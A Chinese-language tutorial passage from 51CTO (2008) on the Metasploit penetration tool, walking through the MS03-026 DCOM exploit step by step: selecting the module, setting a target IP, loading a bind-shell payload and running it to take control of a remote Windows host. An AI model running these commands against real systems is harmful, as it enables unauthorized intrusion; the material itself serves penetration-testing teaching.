您所在的位置:网络安全 > 安全观察 > Metasploit渗透工具的应用(4)

Metasploit渗透工具的应用(4)

2008-03-06 14:20 叶子 51CTO.com 我要评论(0) 字号:T | T
一键收藏,随时查看,分享好友!

本文主要介绍Metasploit的GUI界面的简单使用以及命令行模式下的使用。

AD:

◆输入“info exploit/windows/dcerpc/ms03_026_dcom”指令,了解MS03_026_dcom利用程序的相关信息内容,如下图所示:

图13

◆根据了解的MS03_026_dcom的相关信息,使用漏洞利用程序。
输入:use exploit/windows/dcerpc/ms03_026_dcom
查看利用程序需要设置的相关内容
输入:show options
设置攻击目的主机的IP地址
输入:set RHOST 10.0.0.31
设置加载的ShellCode程序
输入:set PAYLOAD generic/shell_bind_tcp
执行利用程序
输入:exploit
系统攻击成功,并获取远程主机的权限,如下图所示:

图14

Metasploit会不定期更新可利用的漏洞程序,可以通过Online Update来进行升级。

由于Metasploit是国外的开源组织来维护,所以其中的exploit程序主要是针对国外语言的操作系统。对于中文操作系统的exploit程序,有些还需要进一步的修改。叶子会在以后的文章中来讨论怎样修改Metasploit的exploit程序内容。

【51CTO.COM 独家特稿,转载请注明出处及作者!】

【责任编辑:于捷 TEL:(010)68476606】

内容导航

网友评论TOP5

查看所有评论(

提交评论

  1. 安全团队数据库管理员通力协作?
  2. Wi-Fi提示 十一项错误与正确措施

文章排行

本月本周24小时

热点专题

更多>>

读书

网管员成长手记——网络组建、配置与应用
本书主要以“网管员的成长经历”为线索展开,虚拟出一个“新手”网管员的工作和学习环境,将网管员的成长分为4个阶段,以“网管

51CTO旗下网站

领先的IT技术网站 51CTO 领先的中文存储媒体 WatchStor 中国首个CIO网站 CIOage 中国首家数字医疗网站 HC3i 移动互联网生活门户 灵客风LinkPhone